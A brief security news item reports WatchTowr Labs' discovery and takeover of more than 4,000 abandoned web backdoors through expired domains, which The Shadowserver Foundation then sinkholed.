BleepingComputer reports that more than 4,000 live web backdoors neglected by threat actors have been identified, taken over, and eventually dismantled following the registration of expired domains.
Included in the discovered web shells were China Chopper — which is a fixture among advanced persistent threat operations — c99shell, and r57shell, as well as a backdoor that integrated Lazarus Group-like capabilities, according to a report from WatchTowr Labs. Such backdoors were noted to have compromised several government organizations in China, Bangladesh, and Nigeria, as well as universities and higher education entities in China, South Korea, and Thailand. Ownership of all 40 domains leveraged to determine the web shells has been passed on to The Shadowserver Foundation, which has since proceeded to sinkhole the backdoors' communication infrastructure, said WatchTowr Labs researchers. Such findings were noted to indicate the potential renewed usage of expired domains in future cyberattacks.